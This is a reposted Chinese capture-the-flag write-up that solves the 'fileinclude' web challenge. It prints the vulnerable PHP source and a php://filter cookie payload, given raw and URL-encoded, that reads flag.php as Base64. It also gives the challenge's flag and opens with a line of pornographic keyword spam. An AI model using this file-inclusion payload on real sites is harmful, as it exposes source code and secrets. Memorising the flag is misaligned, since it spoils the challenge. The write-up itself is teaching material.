国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Web安全攻防世界01 fileinclude(宜興網(wǎng)信辦)

這篇具有很好參考價值的文章主要介紹了Web安全攻防世界01 fileinclude(宜興網(wǎng)信辦)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

問題描述:

Web安全攻防世界01 fileinclude(宜興網(wǎng)信辦)

攻防世界文件包含入門題目,參考大佬們的WP有所補充,內(nèi)容對小白友好~


原因分析:

按照慣例,首先查看源代碼ctrl+u:

Web安全攻防世界01 fileinclude(宜興網(wǎng)信辦)

整理一下大概是下面這個意思(代碼0基礎(chǔ),可能有誤,歡迎留言溝通與指正~)


<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></head>
//規(guī)定 HTML 文檔的字符集

<br />
<b>Notice</b>:  Undefined index: language in <b>/var/www/html/index.php</b> on line <b>9</b><br />
Please choose the language you want : English or Chinese
<h1>Hi,EveryOne,The flag is in flag.php</h1><html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></head>
//頁面顯示內(nèi)容,其中提示了language的設(shè)置與地址,flag所在地址。

<?php
if( !ini_get('display_errors') ) { //如果 環(huán)境變量未設(shè)置錯誤回顯
  ini_set('display_errors', 'On'); //則 開啟錯誤信息回顯
  }
error_reporting(E_ALL); //報告所有類型的錯誤
$lan = $_COOKIE['language']; //將cookie中['language']的值賦予lan
if(!$lan) //如果變量 lan為0
{
	@setcookie("language","english"); //向客戶端發(fā)送cookie(名稱為"language",值為"english")
	@include("english.php"); //文件包含(調(diào)用文件"english.php")
}
else //若不滿足上述條件
{
	@include($lan.".php"); //文件包含(調(diào)用變量$lan,添加后綴".php")
}
$x=file_get_contents('index.php'); //將文件 index.php的內(nèi)容讀入變量 x中
echo $x; //輸出 變量x的值
?>
</html></html>

所以題目的關(guān)鍵在于達成這第15行的條件:

$lan = $_COOKIE['language'];

在cookie中的內(nèi)容language 會被傳到變量$lan,繼而在第23行@include($lan.".php");被調(diào)用與執(zhí)行,因此cookie變量中很適合寫入讀取flag.php的payload~


解決方案:

工具:burpsuite 或 hackbar(瀏覽器插件)

參考:admin發(fā)表的官方WP?zhan3614發(fā)表的WP fileinclude?

1?Burp Suite抓包

首先用Burp Suite攔截網(wǎng)頁的請求包,頁面如下圖所示:

Web安全攻防世界01 fileinclude(宜興網(wǎng)信辦)

emm,發(fā)現(xiàn)沒有題目要求的變量cookie,這樣就很難實現(xiàn)題目要求的條件了...

2 添加cookie

現(xiàn)在需要手動添加cookie,可以通過burpsuite或者hackbar添加~

1)Burp Suite,在頁面的右下角Request Cookies可以找到添加變量的位置~

? Name:language

? Value:php://filter/read=convert.base64-encode/resource=/var/www/html/flag

? Name的值為第15行代碼要求的名稱,Value的值可將flag(.php)內(nèi)容以Base64編碼的形式讀取~

php://filter/read=執(zhí)行文件讀取功能~(官方介紹:PHP: php:// - Manual)

convert.base64-encode執(zhí)行Base64編碼功能~

/resource=/var/www/html/flag填寫flag.php所在的地址,本題在源碼的第5行有提示地址為language in <b>/var/www/html/index.php</b> on line?;且需要注意注意源碼第23行的內(nèi)容(@include($lan.".php");?),在上傳參數(shù)時代碼會附帶后綴.php,所以此處不需要寫為?'/var/www/html/flag.php'~

Web安全攻防世界01 fileinclude(宜興網(wǎng)信辦)

或者可以直接復(fù)制這一行到請求包末尾(同樣的語句,經(jīng)過URL編碼):

Cookie: language=php%3a%2f%2ffilter%2fread%3dconvert.base64-encode%2fresource%3d%2fvar%2fwww%2fhtml%2fflag

消息變成如下所示以后發(fā)送:?

Web安全攻防世界01 fileinclude(宜興網(wǎng)信辦)

然后就得到了一個 編碼為Base64的flag,如下圖~

Web安全攻防世界01 fileinclude(宜興網(wǎng)信辦)

右鍵傳到burpsuite自帶的解碼模塊decoder中可以解碼~Web安全攻防世界01 fileinclude(宜興網(wǎng)信辦)

?$flag=cyberpeace{9fbd1f023749c48900cf215fe902c204}

2)采用chrome的擴展工具hackbar 添加cookie的值;解題的思路與上面是一致的:F12調(diào)出開發(fā)者工具,操作步驟如下圖就可以~

Name:cookie

Value:language=php://filter/read=convert.base64-encode/resource=/var/www/html/flag

Web安全攻防世界01 fileinclude(宜興網(wǎng)信辦)

頁面上方回顯以base64格式編碼的flag,復(fù)制到網(wǎng)址欄,隨后可用hackbar自帶的解碼模塊encoding找到base64 encode選項進行解碼~

Web安全攻防世界01 fileinclude(宜興網(wǎng)信辦)

Web安全攻防世界01 fileinclude(宜興網(wǎng)信辦)

flag=cyberpeace{9fbd1f023749c48900cf215fe902c204}

博文寫得模糊或者有誤之處,歡迎留言討論與批評~

碼字不易,若有所幫助,可以點贊支持一下博主嘛?感謝~(●'?'●)文章來源地址http://www.zghlxwxcb.cn/news/detail-404730.html

到了這里,關(guān)于Web安全攻防世界01 fileinclude(宜興網(wǎng)信辦)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔相關(guān)法律責任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • Web安全攻防世界06 easyupload

    Web安全攻防世界06 easyupload

    這道題我掙扎了很久,還是沒有解出來,詳細 錯誤 解題思路可以參考另一篇博文~(#_-) CTF 總結(jié)01:文件上傳繞過_梅頭腦_的博客-CSDN博客 ↑博文很啰嗦地講述了我用蟻劍連接一句話木馬花式寫法的各種失敗姿勢,面對文件上傳一步一個坑的絕望心態(tài),歡迎同伴圍觀、吐槽和指

    2024年02月07日
    瀏覽(20)
  • 移動應(yīng)用安全合規(guī)動態(tài):網(wǎng)信辦發(fā)布2大重磅文件!《兒童智能手表個人信息和權(quán)益保護指南》發(fā)布;iOS出現(xiàn)0 day漏洞(第2期)

    移動應(yīng)用安全合規(guī)動態(tài):網(wǎng)信辦發(fā)布2大重磅文件!《兒童智能手表個人信息和權(quán)益保護指南》發(fā)布;iOS出現(xiàn)0 day漏洞(第2期)

    一、監(jiān)管部門動向: 網(wǎng)信辦發(fā)布《網(wǎng)絡(luò)安全事件報告管理辦法(征求意見稿)》、《粵港澳大灣區(qū)(內(nèi)地、香港)個人信息跨境流動標準合同實施指引》;《 兒童智能手表個人信息和權(quán)益保護指南》愛加密深度參編! 二、安全新聞: 蘋果\\\'Lockdown Mode\\\'的破解之法被發(fā)現(xiàn);中國

    2024年02月03日
    瀏覽(633)
  • Web安全攻防世界05 easyphp(江蘇工匠杯)

    Web安全攻防世界05 easyphp(江蘇工匠杯)

    題目是這個樣子的: 發(fā)現(xiàn)自己編輯的東西有一部分沒有被發(fā)出來,怪不得閱讀量低到可憐...現(xiàn)在重新補上一些內(nèi)容,解題過程很羅嗦,對小白依然友好~ 按照慣例,把源碼貼在這里逐行分析一下~ 解題思路如下: 整個題目就是單純地在考驗php語法,并且每個變量輸錯了都有不同

    2024年02月13日
    瀏覽(17)
  • Web安全攻防世界08 very_easy_sql

    Web安全攻防世界08 very_easy_sql

    SQL注入、SSRF類型題目~ crtl+u查看源碼,如下所示~ 經(jīng)過了多次失敗,終于水了一篇混雜了30%的博文鏈接+60%的錯誤解法+文末10%官網(wǎng)wp的博文~ 在我看來這道題目頁面和源碼都沒有明顯的提示項...頁面甚至沒有反饋項,有可能是一道考驗運氣的題目~ 目前看起來是以POST方式注入,

    2024年02月11日
    瀏覽(21)
  • BurpSuite實戰(zhàn)教程01-web滲透安全測試(靶場搭建及常見漏洞攻防)

    BurpSuite實戰(zhàn)教程01-web滲透安全測試(靶場搭建及常見漏洞攻防)

    滲透測試(Penetration test)即安全工程師模擬黑客,在合法授權(quán)范圍內(nèi),通過信息搜集、漏洞挖掘、權(quán)限提升等行為,對目標對象進行安全測試(或攻擊),最終找出安全風險并輸出測試報告。 Web滲透測試分為白盒測試和黑盒測試,白盒測試是指目標網(wǎng)站的源碼等信息的情況

    2024年02月13日
    瀏覽(27)
  • 【秦儲區(qū)塊鏈瀏覽器】通過國家網(wǎng)信辦“境內(nèi)區(qū)塊鏈信息服務(wù)備案”

    【秦儲區(qū)塊鏈瀏覽器】通過國家網(wǎng)信辦“境內(nèi)區(qū)塊鏈信息服務(wù)備案”

    5月24日 , 國家互聯(lián)網(wǎng)信息辦公室正式發(fā)布 “第八批共106個境內(nèi)區(qū)塊鏈信息服務(wù)名稱及備案編號”! 【秦儲區(qū)塊鏈瀏覽器】通過備案 (陜網(wǎng)信備61011322471382750010號) , 成功入選第八批境內(nèi)區(qū)塊鏈信息服務(wù)備案清單! ? 秦儲區(qū)塊鏈瀏覽器 秦儲區(qū)塊鏈瀏覽器 是基于金鏈盟區(qū)塊

    2024年02月13日
    瀏覽(93)
  • 元話數(shù)藏SaaS平臺成功通過國家網(wǎng)信辦區(qū)塊鏈信息服務(wù)備案

    元話數(shù)藏SaaS平臺成功通過國家網(wǎng)信辦區(qū)塊鏈信息服務(wù)備案

    2022年 11 月 8 日,國家互聯(lián)網(wǎng)信息辦公室公布了第 10 批共 532 個境內(nèi)區(qū)塊鏈信息服務(wù)名稱及備案編號。 ?

    2024年02月11日
    瀏覽(88)
  • 神策分析 Copilot 成功通過網(wǎng)信辦算法備案,數(shù)據(jù)分析 AI 化全面落地

    神策分析 Copilot 成功通過網(wǎng)信辦算法備案,數(shù)據(jù)分析 AI 化全面落地

    近日,神策數(shù)據(jù)嚴格遵循《互聯(lián)網(wǎng)信息服務(wù)深度合成管理規(guī)定》,已完成智能數(shù)據(jù)問答算法備案。該算法基于大模型技術(shù), 專注于為客戶提供數(shù)據(jù)指標查詢和數(shù)據(jù)洞察方面的專業(yè)回答。 神策分析 Copilot 運用神策數(shù)據(jù)智能數(shù)據(jù)問答算法,聚焦分析軟件上手難、分析結(jié)果獲取滯

    2024年03月16日
    瀏覽(85)
  • [CTF/網(wǎng)絡(luò)安全] 攻防世界 Web_php_include 解題詳析(php偽協(xié)議、data偽協(xié)議、file偽協(xié)議)

    [CTF/網(wǎng)絡(luò)安全] 攻防世界 Web_php_include 解題詳析(php偽協(xié)議、data偽協(xié)議、file偽協(xié)議)

    這段代碼首先通過 show_source(__FILE__) 顯示當前文件的源代碼,然后通過 $_GET[\\\'hello\\\'] 顯示 URL 參數(shù)中名為 hello 的值。 接下來,代碼使用 $_GET[\\\'page\\\'] 獲取 URL 參數(shù)中名為 “page” 的值,并進行字符串替換,將 php:// 替換為空字符串 這是為了防止通過 URL 參數(shù)加載本地文件或其他可

    2024年02月08日
    瀏覽(28)
  • 攻防世界easyupload (web新手)

    攻防世界easyupload (web新手)

    典型的文件上傳,本題涉及知識點 文件上傳漏洞 .user.ini繞過 其實這個題目是文件上傳漏洞中相對來說不是很常見的題目,說實話也是涉及了我的知識盲區(qū),在此之前我對文件上傳漏洞有一些總結(jié)如下,都嘗試過后發(fā)現(xiàn)沒有能用的。 1. JavaScript 防御 檢測發(fā)生在瀏覽器端(本地

    2023年04月16日
    瀏覽(48)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包